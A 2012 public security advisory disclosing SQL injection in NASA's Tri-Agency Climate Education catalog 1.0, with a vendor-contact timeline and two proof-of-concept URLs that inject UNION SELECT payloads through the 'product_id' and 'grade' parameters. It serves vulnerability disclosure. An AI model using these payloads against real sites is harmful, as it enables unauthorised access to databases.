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NASA Tri-Agency Climate Education (TrACE) 1.0 SQL Injection

Posted on 26 October 2012

 NASA Tri-Agency Climate Education (TrACE) v1.0 SQL Injection Vulnerability Vendor: NASA Product web page: http://www.nasa.gov Affected version: 1.0 Summary: The Tri-Agency Climate Education (TrACE) Catalog provides search and browse access to a catalog of educational products and resources. TrACE focuses on climate education resources that have been developed by initiatives funded through NASA, NOAA, and NSF, comprising a tri-agency collaboration around climate education. Desc: The application suffers from an SQL Injection vulnerabilities when input is passed to the 'product_id' and 'grade' GET parameters in 'trace_results.php' script which is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Tested on: Apache/2.2.21 PHP 5.2.17 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Zero Science Lab - http://www.zeroscience.mk Vendor status: [03.10.2012] Vulnerability discovered. [03.10.2012] Initial contact with the vendor. [04.10.2012] No reply from vendor. [05.10.2012] Tried contacting the vendor again. [12.10.2012] No reply from vendor. [13.10.2012] Last try contacting the vendor. [15.10.2012] Vendor replies stating that the problem is solved?! [16.10.2012] Replied to vendor that no problems are solved because no details were sent nor problems explained. [17.10.2012] Vendor decides to talk serious and asks for details, cynically. [18.10.2012] Sent detailed information and PoC files to the vendor. [22.10.2012] Asked vendor for status report. [22.10.2012] No reply from vendor. [23.10.2012] Vendor silently patches the application (v2.0). [23.10.2012] Asked vendor to have proper communication. [25.10.2012] No reply from vendor. [25.10.2012] Pointed out to the vendor about disclosure policy and ethical communication. [26.10.2012] Public security advisory released. Advisory ID: ZSL-2012-5112 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5112.php 03.10.2012 PoC: ---- https://www.example.com/trace/trace_results.php?product_id=117+union+all+select+concat(unhex(hex(cast(database()+as+char)))0,2,3,4,5,6,7-- https://www.example.com/trace/trace_results.php?product_id=117&project_id=40&funder=31&pi=43&grade=99999.9+union+all+select+concat(unhex(hex(cast(database()+as+char)))0,2,3,4,5,6,7--